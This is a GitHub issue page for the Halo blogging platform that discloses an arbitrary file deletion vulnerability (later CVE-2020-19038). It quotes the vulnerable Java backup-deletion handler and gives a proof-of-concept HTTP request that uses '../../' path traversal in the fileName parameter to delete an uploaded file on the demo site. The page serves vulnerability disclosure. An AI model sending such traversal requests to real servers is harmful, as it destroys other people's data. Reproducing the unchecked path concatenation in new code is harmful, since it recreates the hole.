Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
我确定我已经查看了 (标注[ ]为[x])
[ ]
[x]
我要申请 (标注[ ]为[x])
There is an arbitrary file deletion vulnerability in the backup file deletion.
@GetMapping(value = "delBackup") @ResponseBody public JsonResult delBackup(@RequestParam("fileName") String fileName, @RequestParam("type") String type) { final String srcPath = System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName; try { FileUtil.del(srcPath); return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-success")); } catch (Exception e) { return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-failed")); } }
eg.
GET /admin/backup/delBackup?type=posts&fileName=../../upload/2019/3/veer-15238236420190404102850332.jpg HTTP/1.1 Host: demo.halo.run Connection: close Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Referer: https://demo.halo.run/admin/backup?type=posts Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=jLIF44HA_8IHwVFhq66-jAArsdL3Mtz_tg2GvNhO
The vulnerability discoverer by Chaitin Tech.
The text was updated successfully, but these errors were encountered:
准备发布 v1,所以关闭该 issue。
Sorry, something went wrong.
CVE-2020-19038 was discovered by Chaitin Tech. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-19038
chore(deps): bump filepond-plugin-image-preview from 4.6.1 to 4.6.2 (h…
83b3ebb
…alo-dev#136) Bumps [filepond-plugin-image-preview](https://github.com/pqina/filepond-plugin-image-preview) from 4.6.1 to 4.6.2. - [Release notes](https://github.com/pqina/filepond-plugin-image-preview/releases) - [Commits](pqina/filepond-plugin-image-preview@4.6.1...4.6.2) Signed-off-by: dependabot-preview[bot] <support@dependabot.com> Co-authored-by: dependabot-preview[bot] <27856297+dependabot-preview[bot]@users.noreply.github.com>
No branches or pull requests
我确定我已经查看了 (标注
[ ]为[x])我要申请 (标注
[ ]为[x])There is an arbitrary file deletion vulnerability in the backup file deletion.
eg.
The vulnerability discoverer by Chaitin Tech.
The text was updated successfully, but these errors were encountered: